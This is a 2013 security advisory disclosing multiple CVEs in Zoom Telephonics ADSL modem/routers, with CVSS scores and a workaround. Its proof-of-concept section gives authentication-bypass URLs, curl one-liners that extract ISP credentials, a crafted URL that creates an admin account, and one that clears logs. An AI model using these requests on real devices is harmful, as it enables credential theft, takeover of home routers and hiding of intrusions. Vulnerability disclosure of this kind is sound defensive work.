Lucene search

K
packetstormKyle LovettPACKETSTORM:123053
HistorySep 02, 2013 - 12:00 a.m.

Zoom Telephonics Bypass / Traversal / Improper Handling

2013-09-0200:00:00
Kyle Lovett
packetstormsecurity.com
21
`Five models of the Zoom Telephonics ADSL Modem/Router line suffer from  
multiple critical vulnerabilities, almost all being of a remote access  
attack vector.  
  
Models affected:  
Zoom X3 ADSL Modem/Router  
Zoom X4 ADSL Modem/Router  
Zoom X5 ADSL Modem/Router  
Zoom ADSL Bridge Modem Model 5715 (1 vulnerability)  
Zoom USB ADSL Modem Model 5510B (1 vulnerability)  
  
  
Timeline:  
The vendor has not responded to our inquires concerning these  
vulnerabilities. They were first reported on June 28th, 2013 and  
partial disclosure was made on July 9, 2013.  
  
----------------------------------------------------------------------------------------------------------------  
----------------------------------------------------------------------------------------------------------------  
  
Directory Traversal/Unauthenticated access to administrative panels  
  
CVSS Base Score 9.7  
Impact Subscore 9.5  
Temporal Score: 8.3  
(AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)  
CWE-22: Improper Limitation of a Pathname to a Restricted Directory  
  
CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X  
2.2.X 2.5.X 3.2  
CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X  
CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X  
2.2.X 2.5.X 3.0.X  
  
  
By simply placing the following two URLs into a web browser, a  
vulnerability will all models and firmware versions allow for bypass  
of administrative credential challenge. All models and firmware  
versions can access these pages with no authentication. An  
un-authenticated user can preform almost all administrative tasks once  
the authentication is bypassed.  
  
http://<IP>/hag/pages/toc.htm (--Menu Banner)  
http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu)  
  
  
----------------------------------------------------------------------------------------------------------------  
  
  
Improper handling of unexpected characters/data  
  
CVSS Base Score 8.3  
Impact Subscore 8.5  
Temporal Score: 6.7  
(AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR)  
CWE-241: Improper Handling of Unexpected Data Type  
  
CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X  
2.2.X 2.5.X 3.2  
CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X  
CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X  
2.2.X 2.5.X 3.0.X  
CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions  
CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions  
  
When an unexpected/illegal character is added to the end of any URL  
which calls a value, such as http://<IP>/MainPage?id=25' the browser  
will immediately redirect the browser to the "System Status" page  
without authentication, where links to each interface (i.e.  
eth-0,usb-0,etc) is both selectable whose properties can be edited.  
  
  
----------------------------------------------------------------------------------------------------------------  
  
Plain text storage of ISP/PPPoe usernames/passwords  
  
CVSS Base Score 6.8  
Impact Subscore 6.4  
Temporal Score: 8.6  
(AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR)  
CWE-311: Missing Encryption of Sensitive Data  
  
CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X  
2.2.X 2.5.X 3.2  
CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X  
CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X  
2.2.X 2.5.X 3.0.X  
  
The following command will display the ISP usernames and passwords.  
(The print value may vary slightly based on firmware.)  
  
Proof of Concept  
curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }'  
value="wanpasswd1" ('or similar')  
  
curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }'  
value="[email protected]" ('or similar')  
  
  
----------------------------------------------------------------------------------------------------------------  
  
Unauthenticated direct execution of administrative tasks  
  
CVSS Base Score 10.0  
Impact Subscore 10.0  
Temporal Score: 8.6  
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)  
CWE-285: Improper Authorization  
  
CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X  
CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X  
CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X  
  
Administrative authentication can be bypassed and commands directly  
executed with specially crafted commands.  
  
Proofs of Concept -  
  
Create New Acct Admin or Intermediate - (all PW and admin names are  
'or similar')  
  
http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes  
  
  
Clear Logs  
  
http://<IP>/Action?id=76&cmdClear+Log=Clear+Log  
  
----------------------------------------------------------------------------------------------------------------  
  
Fixes/Patches:  
There are no known patches or fixes for these vulnerabilities at this time.  
  
  
Workaround:  
It is advised to turn off all remote administrative access to the  
router. This workaround however, will not prevent local attacks.  
  
----------------------------------------------------------------------------------------------------------------  
  
External Links  
http://www.osvdb.org/show/osvdb/95071  
http://xforce.iss.net/xforce/xfdb/85612  
http://www.idappcom.com/db/?7819  
  
  
Vendor Links  
http://www.zoomtel.com/products/5715.html  
http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf  
http://www.zoomtel.com/products/adsl_overview.html  
http://www.zoomtel.com/products/5760.html  
http://www.zoomtel.com/products/5751.html  
http://www.zoomtel.com/products/5754.html  
  
  
Discovered - 06-28-2013  
Updated - 09/01/2013  
Research Contact - K Lovett  
Affiliation - QuattroSG  
`